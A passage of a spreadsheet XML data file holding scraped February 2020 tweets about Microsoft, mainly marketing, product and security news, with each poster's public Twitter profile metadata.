'https://pbs.twimg.com/profile_banners/1030959660994580487/1534635196',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</si>
  <si>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13:06:34 +0000 2020</t>
  </si>
  <si>
    <t>Uncover insights to help streamline processes, boost productivity, and gain an edge over your competitors with #Microsoft #PowerBI. Subscribe to learn more! https://t.co/sax7gWlaPK</t>
  </si>
  <si>
    <t>{'id': 1437166994, 'id_str': '1437166994', 'name': 'Jerome Thomas', 'screen_name': 'JMThomas39', 'location': 'Lynn, Ma', 'description': 'Managing Director/Owner at T6 IT Solutions', 'url': 'https://t.co/5q2wfrxFcI', 'entities': {'url': {'urls': [{'url': 'https://t.co/5q2wfrxFcI', 'expanded_url': 'http://www.t6itsolutions.com', 'display_url': 't6itsolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 41, 'friends_count': 99, 'listed_count': 3, 'created_at': 'Sat May 18 01:57:55 +0000 2013', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 338,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'http://pbs.twimg.com/profile_images/808019951067996164/Vqf3Hkua_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/808019951067996164/Vqf3Hkua_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1437166994/1481481910',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</si>
  <si>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Uncover insights to help streamline processes, boost productivity, and gain an edge over your competitors with #Microsoft #PowerBI. Subscribe to learn more! https://t.co/3fu6Tq6wvP</t>
  </si>
  <si>
    <t>{'id': 796946609036783616, 'id_str': '796946609036783616', 'name': 'T6 IT Solutions', 'screen_name': 'T6ITSolutions', 'location': 'Lynn, MA', 'description': 'IT Managed Service Provider', 'url': 'https://t.co/5q2wfrxFcI', 'entities': {'url': {'urls': [{'url': 'https://t.co/5q2wfrxFcI', 'expanded_url': 'http://www.t6itsolutions.com', 'display_url': 't6itsolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 22, 'friends_count': 26, 'listed_count': 2, 'created_at': 'Fri Nov 11 05:24:12 +0000 2016', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 388,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'http://pbs.twimg.com/profile_images/859064818073993216/AbR6WgvV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/859064818073993216/AbR6WgvV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/796946609036783616/1478926853',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</si>
  <si>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13:06:07 +0000 2020</t>
  </si>
  <si>
    <t>Boost sales productivity: Meet customers at any journey point, implement seamless solutions, ease onboarding &amp;amp; alignment +more. Read more &amp;amp; subscribe!  #Microsoft #Dynamics365 and Compuville Systems. https://t.co/PEZaxXsYnK</t>
  </si>
  <si>
    <t>Wed Feb 26 13:05:16 +0000 2020</t>
  </si>
  <si>
    <t>#Windows 10 Always On #VPN #SSL certificate requirements and recommendations for SSTP. #Microsoft #Windows10 #Win10 #aovpn #mobility #security https://t.co/nlQU0WZOhC</t>
  </si>
  <si>
    <t>Wed Feb 26 13:02:40 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Security Defaults going to be enforced Feb29 and will be on by default in all net new tenants. This enables MFA for all users and only supports the Authenticator  App. Be prepared! #security #securitydefaults #microsoft #msp
https://t.co/YmHGA2xNnF</t>
  </si>
  <si>
    <t>Wed Feb 26 13:02:33 +0000 2020</t>
  </si>
  <si>
    <t>Former #Microsoft Employee Found Guilty For Stealing $10M And Laundering With #Bitcoin
https://t.co/C43DnLaFMp https://t.co/hlPfdRlFpm</t>
  </si>
  <si>
    <t>Wed Feb 26 13:01:33 +0000 2020</t>
  </si>
  <si>
    <t>Complete #TechnicalSupport complete #Microsoft product related services,24x7 round the clock service #MicrosoftHelp
#Microsoftcontact
Skype
Onedrive
OneNote 
Bing
Call to #MicrosoftAustraliacontact
Toll free number  -1800-517-221 https://t.co/FVAjIbiSUG</t>
  </si>
  <si>
    <t>Wed Feb 26 13:01:26 +0000 2020</t>
  </si>
  <si>
    <t>Visiting #CyFrica2020 today? Do not forget to meet the team of @MicrosoftNG Nigeria at their booth to know how they can help your organization enable safe digital transformation in the era of intelligent cloud &amp;amp; intelligent edge.
#TimeToChange #CyberSecurity #Solution #Microsoft https://t.co/LuR8E10aBM</t>
  </si>
  <si>
    <t>{'id': 935208292762116096, 'id_str': '935208292762116096', 'name': 'Tradepass', 'screen_name': 'Tradepassglobal', 'location': 'Bengaluru, India', 'description': 'We unite business communities across borders by organizing B2B conferences, expos, training and in-house events across Asia and Middle East. #Event #Summit', 'url': 'https://t.co/iv0LqFRo2u', 'entities': {'url': {'urls': [{'url': 'https://t.co/iv0LqFRo2u', 'expanded_url': 'http://tradepassglobal.com/', 'display_url': 'tradepassglobal.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 240, 'friends_count': 407, 'listed_count': 1, 'created_at': 'Mon Nov 27 18:06:47 +0000 2017', 'favourites_count': 95, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 931,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'http://pbs.twimg.com/profile_images/975604294157180929/TW_SP-j7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/975604294157180929/TW_SP-j7_normal.jpg',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</si>
  <si>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13:01:11 +0000 2020</t>
  </si>
  <si>
    <t>CAREFUL! Don't let the bad people hack your Office 365 account.
#Office365 #Office #Microsoft #Hacking #BadPeople
https://t.co/GnAZrxRplh</t>
  </si>
  <si>
    <t>Wed Feb 26 13:00:17 +0000 2020</t>
  </si>
  <si>
    <t>Go into the tennis court again and smash your way through the championships in Smash Court Tennis 3 https://t.co/syHgO3Ai3r #microsoft #xbox360 #fun #gamer #tennis https://t.co/AsnSQRpRi7</t>
  </si>
  <si>
    <t>Wed Feb 26 13:00:07 +0000 2020</t>
  </si>
  <si>
    <t>Considering joining 96% of companies that use cloud computing? 
If #Azure is in your future it's critical to understand Azure Migrate. Learn more: https://t.co/kZT5RTH0CN
#microsoft #microsoft365 #cloud https://t.co/TaTMnQlHcr</t>
  </si>
  <si>
    <t>Wed Feb 26 13:00:04 +0000 2020</t>
  </si>
  <si>
    <t>Fileless attack detection for #Linux is now in preview. Signup for the preview now! #linuxonazure #microsoft.    #Avtex https://t.co/E9WwguW5fj</t>
  </si>
  <si>
    <t>Wed Feb 26 12:59:09 +0000 2020</t>
  </si>
  <si>
    <t>What Was Microsoft Thinking? https://t.co/jmkxRWSsAd #blog #blogpost #newpost #microsoft #office365 #office365proplus #searchengine #bing #googlechrome #defaultsearchengine #browserextension #technology #tech</t>
  </si>
  <si>
    <t>Wed Feb 26 12:57:45 +0000 2020</t>
  </si>
  <si>
    <t>Nothing like some morning virtue signaling....let's focus on everything but the code we're writing..... classic #microsoft https://t.co/Aef5bwQlFw</t>
  </si>
  <si>
    <t>{'id': 388539647, 'id_str': '388539647', 'name': 'LamboWhaleâš¡', 'screen_name': 'LamboWhale', 'location': 'United States', 'description': '#BitcoinTheOriginalDefi\n#HODLERofLastResort\n#SeperationOfMoneyAndState', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 179, 'friends_count': 507, 'listed_count': 3, 'created_at': 'Mon Oct 10 22:38:03 +0000 2011', 'favourites_count': 4509, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3677,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'http://pbs.twimg.com/profile_images/1013636627288256512/CfpKwbiS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1013636627288256512/CfpKwbiS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/388539647/1514693597',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</si>
  <si>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12:57:22 +0000 2020</t>
  </si>
  <si>
    <t>Dont forget to join https://t.co/TIFMryABk1 our #February 28th #Microsoft #Office365 #webinar! Learn the benefits and its features for your #organization. Register today to save your spot. #SharePoint #business #DigitalTransformation #MicrosoftTeams #Microsoft365 #PowerBI https://t.co/r2tf8jKfUq</t>
  </si>
  <si>
    <t>{'id': 370199058, 'id_str': '370199058', 'name': 'NGenious Solutions', 'screen_name': 'NGeniousS', 'location': 'New Jersey, USA', 'description': 'An international IT services and solutions provider. We are experts in SharePoint, Cloud, BI, Automation, Licensing, Custom Application Development and Database', 'url': 'http://t.co/vAk4i9dGHe', 'entities': {'url': {'urls': [{'url': 'http://t.co/vAk4i9dGHe', 'expanded_url': 'http://www.ngenioussolutions.com', 'display_url': 'ngenioussolutions.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 365, 'friends_count': 355, 'listed_count': 35, 'created_at': 'Thu Sep 08 16:34:33 +0000 2011', 'favourites_count': 388, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 180, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '1D2F53', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/846251608417685505/1FNo42gn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/846251608417685505/1FNo42gn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/370199058/1524130149', 'profile_link_color': '1D2F53',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</si>
  <si>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12:56:50 +0000 2020</t>
  </si>
  <si>
    <t>Our most recent student presentations were delivered by Mollie and Chandni. They spoke about a bracelet that stops devices listening to you (eg #Alexa or #Google) and also about #Microsoft's mixed reality technology, #HoloLens. Fascinating stuff guys, thanks! https://t.co/VwrhnR7lW1</t>
  </si>
  <si>
    <t>{'id': 1156939459696443394, 'id_str': '1156939459696443394', 'name': 'Wild Code School Dublin', 'screen_name': 'Wild_Dublin', 'location': 'Dublin', 'description': 'We are a part of a growing network of European campuses helping create the future digital superstars', 'url': 'https://t.co/JQcrwqxsTJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/JQcrwqxsTJ', 'expanded_url': 'https://www.wildcodeschool.com/en-IE', 'display_url': 'wildcodeschool.com/en-IE', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 196, 'friends_count': 794, 'listed_count': 0, 'created_at': 'Thu Aug 01 14:47:16 +0000 2019', 'favourites_count': 132, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 309, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1156940995419889664/1mIIm-_3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1156940995419889664/1mIIm-_3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1156939459696443394/1579182646',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</si>
  <si>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12:55:02 +0000 2020</t>
  </si>
  <si>
    <t>Expanding the Fluent design to #Microsoft #OneDrive for Android https://t.co/FLFv0F6zgI https://t.co/dSOS8PiDVV</t>
  </si>
  <si>
    <t>{'id': 15981173, 'id_str': '15981173', 'name': 'Chris Bortlik', 'screen_name': 'cbortlik', 'location': 'Woburn, MA', 'description': 'Works for Microsoft as a Principal Technical Architect at the MTC in Boston, MA. Author. Speaker. Blogger. Husband. Dad.', 'url': 'https://t.co/ZXCiJf7qzV', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZXCiJf7qzV', 'expanded_url': 'https://medium.com/@cbortlik', 'display_url': 'medium.com/@cbortlik', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1988, 'friends_count': 1066, 'listed_count': 201, 'created_at': 'Mon Aug 25 13:28:48 +0000 2008', 'favourites_count': 2739, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5621,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'http://pbs.twimg.com/profile_images/906889522272600064/6_EMipz1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/906889522272600064/6_EMipz1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15981173/1434464120', 'profile_link_color': '0084B4',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</si>
  <si>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12:54:28 +0000 2020</t>
  </si>
  <si>
    <t>#Xbox March 2020 Games with Gold Include Batman, Dracula, Shantae, and Sonic https://t.co/6ylQoTQTPL #XboxLiveGold #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 12:53:38 +0000 2020</t>
  </si>
  <si>
    <t>Gates proceeds to become a HUGE globalist openly.  Turns out his father was intimately tied to #IBM and the ideology of #Eugenics and #PlannedParenthood itself.  Allegations swirl the tech world that #Microsoft was only ever a way for #IBM to push #DOS #DiskOperatingSystem</t>
  </si>
  <si>
    <t>{'id': 27928194, 'id_str': '27928194', 'name': 'thehhpnet', 'screen_name': 'thehhpnet', 'location': 'TX', 'description': 'Fatum &amp; Geschischta : #QANON : #DarkToLight : #MAGA #KAG #MIGA : #restart : #Patriot : #AutismSpeaks : #SpaceForce : #AntiWar : #EndHomelessness.', 'url': 'https://t.co/7gLmpshaAM', 'entities': {'url': {'urls': [{'url': 'https://t.co/7gLmpshaAM', 'expanded_url': 'https://wearethene.ws', 'display_url': 'wearethene.ws', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3219, 'friends_count': 4599, 'listed_count': 3, 'created_at': 'Tue Mar 31 18:19:14 +0000 2009', 'favourites_count': 3871, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6377,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'http://pbs.twimg.com/profile_images/1048029601765548033/9ZWtQN9h_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1048029601765548033/9ZWtQN9h_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/27928194/1580066141',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</si>
  <si>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12:50:51 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft expanding strategic partnership with #Telefonica to boost #Spains competitiveness
@Microsoft
@Windows
@MicrosoftStore
@MicrosoftEDU
@Office
@Azure
@MSFTnews
@Office365
@microsoft
@MicrosoftHelps 
@telecomdrive
https://t.co/zQfOzz73ov</t>
  </si>
  <si>
    <t>{'id': 44577325, 'id_str': '44577325', 'name': 'Zia Askari', 'screen_name': 'ziaaskari', 'location': 'Delhi - NCR', 'description': '', 'url': 'https://t.co/WxQM8pqlxd', 'entities': {'url': {'urls': [{'url': 'https://t.co/WxQM8pqlxd', 'expanded_url': 'http://TelecomDrive.com', 'display_url': 'TelecomDrive.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 249, 'friends_count': 591, 'listed_count': 22, 'created_at': 'Thu Jun 04 08:51:37 +0000 2009', 'favourites_count': 68, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8345,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'http://pbs.twimg.com/profile_images/1058097910666059776/fKUGZwgc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1058097910666059776/fKUGZwgc_normal.jpg',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</si>
  <si>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12:50:03 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 12:49:47 +0000 2020</t>
  </si>
  <si>
    <t>Serious question: who wants to install a proprietary malware scanner on their #Linux-based operating system?
Background: #Microsoft offers their "fileless malware scanner": https://t.co/FfDJ4Ob9ps</t>
  </si>
  <si>
    <t>{'id': 1007025684, 'id_str': '1007025684', 'name': 'Max Mehl', 'screen_name': 'mxmehl', 'location': 'Konstanz, Deutschland', 'description': 'Homo {digitalis,politicus,sapiens}. @fsfe Programme Manager, working toward digital freedom. Own views only. Fediverse: https://t.co/AVb4e3TRJz', 'url': 'https://t.co/W36cA6mstQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/W36cA6mstQ', 'expanded_url': 'https://mehl.mx', 'display_url': 'mehl.mx', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/AVb4e3TRJz', 'expanded_url': 'http://mastodon.social/@mxmehl', 'display_url': 'mastodon.social/@mxmehl', 'indices': [120, 143]}]}}, 'protected': False, 'followers_count': 563, 'friends_count': 299, 'listed_count': 26, 'created_at': 'Wed Dec 12 18:44:56 +0000 2012', 'favourites_count': 733, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2900, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': True, 'profile_background_color': '000000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1159844819180519425/MfB8KWWD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1159844819180519425/MfB8KWWD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1007025684/1410615339', 'profile_link_color': '168EC1',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</si>
  <si>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Wed Feb 26 12:49:07 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft expanding strategic partnership with #Telefonica to boost #Spains competitiveness:
@Telefonica
@O2
@telefonicab2b 
@TelefonicaIoT
@TelefonicaUK
@Microsoft
@MicrosoftEdge
@Windows
@EspacioFTef
https://t.co/pedoEOHJ2j</t>
  </si>
  <si>
    <t>{'id': 2318516102, 'id_str': '2318516102', 'name': 'Telecom Drive', 'screen_name': 'telecomdrive', 'location': '', 'description': '', 'url': 'https://t.co/ii9Ul51MpD', 'entities': {'url': {'urls': [{'url': 'https://t.co/ii9Ul51MpD', 'expanded_url': 'http://www.TelecomDrive.com', 'display_url': 'TelecomDrive.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 234, 'friends_count': 20, 'listed_count': 13, 'created_at': 'Thu Jan 30 08:29:47 +0000 2014', 'favourites_count': 43, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4997,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'http://pbs.twimg.com/profile_images/429145273823023104/r9LoBXKr_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/429145273823023104/r9LoBXKr_normal.jpeg',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</si>
  <si>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12:49:02 +0000 2020</t>
  </si>
  <si>
    <t>Why Its Time to Move Away from #Windows7, and Probably Upgrade Your Computer Too https://t.co/j4TdKGqund #microsoft #operatingsystem https://t.co/uZChVP38fM</t>
  </si>
  <si>
    <t>Wed Feb 26 12:46:20 +0000 2020</t>
  </si>
  <si>
    <t>More power to @MicrosoftTeams   - New Power BI tab for Microsoft Teams https://t.co/hZGkwxytZA   @MSPowerBI #Microsoft #PowerBI https://t.co/g6o7camjtg</t>
  </si>
  <si>
    <t>{'id': 118666911, 'id_str': '118666911', 'name': 'Abhijit Jana', 'screen_name': 'AbhijitJana', 'location': 'Bengaluru, India', 'description': 'Director of Technology @WestPharma | Ex-Microsoft |Author @KinectWindows &amp; @HoloLens Books|Speaker|Founder @dailydotnettips |Dad (views are my own)', 'url': 'https://t.co/AAa0Xq8yPz', 'entities': {'url': {'urls': [{'url': 'https://t.co/AAa0Xq8yPz', 'expanded_url': 'http://abhijitjana.net', 'display_url': 'abhijitjana.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2316, 'friends_count': 59, 'listed_count': 103, 'created_at': 'Mon Mar 01 11:46:43 +0000 2010', 'favourites_count': 266, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5570,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'http://pbs.twimg.com/profile_images/1117786348717350917/_JTY5cgi_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1117786348717350917/_JTY5cgi_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/118666911/1441694874',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</si>
  <si>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Wed Feb 26 12:45:28 +0000 2020</t>
  </si>
  <si>
    <t>On the 18th and 19th March well be exhibiting at the Call and Contact Centre Expo with @4net. Register for your free ticket to visit us on stand 2050 where we can speak with you about our #contactcentre for #Microsoft #Teams. #collaboration @CallCentreEx https://t.co/JsAPWwd0fo</t>
  </si>
  <si>
    <t>Wed Feb 26 12:43:00 +0000 2020</t>
  </si>
  <si>
    <t>If you think that was it. #Facebook also doesn't like any news about Nations getting freed from #Microsoft control. #Linux #GNULinux #freedom #Korea #SoKor #SouthKorea https://t.co/ajdI0wRB7z</t>
  </si>
  <si>
    <t>{'id': 99037649, 'id_str': '99037649', 'name': 'áœŒáœ“áœƒáœ’ (Yuki|é›ªäº®) ðŸ‡µðŸ‡­', 'screen_name': 'yahananxie', 'location': 'Verses.Space', 'description': 'Official. Verify: https://t.co/cXuq6VgvUb\n\nFediverse: https://t.co/SstGyczmqD\n\n#Author, #Bibliophile, #Hebrew #Natsari #Yahudi\n\n(×™×•×—× ×Ÿ/è¬ç´„ç¿°/áœŒáœ‘áœˆáœˆáœ”)', 'url': 'https://t.co/JjM3fQxN4V', 'entities': {'url': {'urls': [{'url': 'https://t.co/JjM3fQxN4V', 'expanded_url': 'https://iam.youronly.one', 'display_url': 'iam.youronly.one', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/cXuq6VgvUb', 'expanded_url': 'https://keybase.io/yukino', 'display_url': 'keybase.io/yukino', 'indices': [18, 41]}, {'url': 'https://t.co/SstGyczmqD', 'expanded_url': 'https://aleph.land/@yahananxie', 'display_url': 'aleph.land/@yahananxie', 'indices': [54, 77]}]}}, 'protected': False, 'followers_count': 553, 'friends_count': 807, 'listed_count': 56, 'created_at': 'Thu Dec 24 05:32:06 +0000 2009', 'favourites_count': 806, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 28337,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'http://pbs.twimg.com/profile_images/1028512386318127104/CKWPRlCm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1028512386318127104/CKWPRlCm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/99037649/1491565646',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</si>
  <si>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12:42:09 +0000 2020</t>
  </si>
  <si>
    <t>The #XboxSeriesX Will Have 12 Teraflops and a Focus on Compatibility https://t.co/MGyHIo4tFl #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 12:41:28 +0000 2020</t>
  </si>
  <si>
    <t>Your customers aren't going to be happy if you're breached and data is leaked. To prevent data loss and ensure you can connect with your customers, you need an email provider that you can trust. #Microsoft business-class email is the solution. https://t.co/3ce4YVwRrH</t>
  </si>
  <si>
    <t>Wed Feb 26 12:41:27 +0000 2020</t>
  </si>
  <si>
    <t>Your customers aren't going to be happy if you're breached and data is leaked. To prevent data loss and ensure you can connect with your customers, you need an email provider that you can trust. #Microsoft business-class email is the solution. https://t.co/1zdVo8lT0C</t>
  </si>
  <si>
    <t>Your customers aren't going to be happy if you're breached and data is leaked. To prevent data loss and ensure you can connect with your customers, you need an email provider that you can trust. #Microsoft business-class email is the solution. https://t.co/zj2jQDrV8M</t>
  </si>
  <si>
    <t>Wed Feb 26 12:39:23 +0000 2020</t>
  </si>
  <si>
    <t>$VERB WAKE UP TO $VERB 2020--IT'S A WHOLE NEW WORLD
GLOBAL EXPANSION
WORLD'S 1ST LIVE INTERACTIVE VIDEO WEBINAR PLATFORM (ZOOM KILLER) $ZM
 #MICROSOFT and #SALESFORCE INTEGRATION UPGRADES
DOING BUSINESS 24/7 NO NEED TO TRAVEL
$GNPX $SUMR $NFLX $CRM $ADBE $MSFT $AAPL https://t.co/IqgE0bMlnx</t>
  </si>
  <si>
    <t>{'id': 104499427, 'id_str': '104499427', 'name': 'SheepWolf', 'screen_name': 'realsheepwolf', 'location': '', 'description': 'Always looking for the next profitable trade. I am a trader/investor.   My tweets are simply my opinion and not to be misconstrued as investment advice.', 'url': 'https://t.co/XT8F4GjiVx', 'entities': {'url': {'urls': [{'url': 'https://t.co/XT8F4GjiVx', 'expanded_url': 'https://investorshangout.com/SHEEPWOLFS-100000000-JOURNEY-91662/', 'display_url': 'investorshangout.com/SHEEPWOLFS-100â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 10362, 'friends_count': 2755, 'listed_count': 189, 'created_at': 'Wed Jan 13 14:27:35 +0000 2010', 'favourites_count': 37918, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 88085,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'http://pbs.twimg.com/profile_images/865318818360328193/1ZgWSTkx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/865318818360328193/1ZgWSTkx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/104499427/1571107595', 'profile_link_color': '4A913C',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</si>
  <si>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Feb 26 12:35:14 +0000 2020</t>
  </si>
  <si>
    <t>What can Microsoft 365 do for your organization? Learn about @iLink's competitive advantage here!
https://t.co/Lt2aRF3jyv #ilinksystems #ilinkdifference #cloud #licensing #savecost #csp #microsoft #reducelicensingcost https://t.co/wUenAiXvAJ</t>
  </si>
  <si>
    <t>Wed Feb 26 12:31:41 +0000 2020</t>
  </si>
  <si>
    <t>We've got your back! Get help putting #technology in your school through #Microsoft's online tools. Select, deploy, and learn-it's easy as 1-2-3!     #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/glYniBIbHC</t>
  </si>
  <si>
    <t>Wed Feb 26 12:30:36 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Security solutions help identify and respond to threats 50% faster than was possible just 12 months ago. Find out how: https://t.co/DU26tKKV4N
#ITsecurity #Microsoft #AI</t>
  </si>
  <si>
    <t>{'id': 248629266, 'id_str': '248629266', 'name': 'Fruition Systems', 'screen_name': 'FruitionSystems', 'location': 'Hampshire', 'description': 'Fruition Systems is a leading Microsoft cloud services consultancy. Experienced in #Dynamics365, #SharePoint &amp; #Azure. Managed IT services for businesses.', 'url': 'https://t.co/Mnt28sqOAD', 'entities': {'url': {'urls': [{'url': 'https://t.co/Mnt28sqOAD', 'expanded_url': 'http://www.fruitionsystems.co.uk', 'display_url': 'fruitionsystems.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 268, 'friends_count': 511, 'listed_count': 80, 'created_at': 'Mon Feb 07 11:58:32 +0000 2011', 'favourites_count': 65, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1613, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '7E1229', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1200539636667441158/kwsAMR1Q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1200539636667441158/kwsAMR1Q_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/248629266/1575064992', 'profile_link_color': '7E1229', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'CFCFCF', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 12:27:08 +0000 2020</t>
  </si>
  <si>
    <t>SharePoint Task Management
A simple easy to use tools to manage your Tasks Better
Call Us On Main Office :+1 (855) 977 6634
Customer Support :+1 (647) 521-7558
Email - help@codecreators.ca
#CodeCreators #microsoft #sharepoint #documentmanagement #onedrive https://t.co/cyZzyY7xTq</t>
  </si>
  <si>
    <t>{'id': 819064694572990464, 'id_str': '819064694572990464', 'name': 'Code Creators', 'screen_name': 'CodeCreators_', 'location': 'Canada', 'description': 'Helping to shape the future of your business by providing top-notch IT services #Web #MobileApps #SharePoint #ResourceOutsourcing', 'url': 'https://t.co/AxxI3QnQbO', 'entities': {'url': {'urls': [{'url': 'https://t.co/AxxI3QnQbO', 'expanded_url': 'http://www.codecreators.ca', 'display_url': 'codecreators.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 193, 'friends_count': 539, 'listed_count': 0, 'created_at': 'Wed Jan 11 06:13:35 +0000 2017', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 328,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'http://pbs.twimg.com/profile_images/1146304755033153536/Y1Vka-J8_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1146304755033153536/Y1Vka-J8_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/819064694572990464/1562223072',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</si>
  <si>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12:26:53 +0000 2020</t>
  </si>
  <si>
    <t>#Attackers are probing for #vulnerable #Microsoft Exchange #servers.
Microsoft released a patch for a severe #vulnerability in Microsoft Exchange Server 
https://t.co/NkKMVBsVWP https://t.co/phvDTLfVtP</t>
  </si>
  <si>
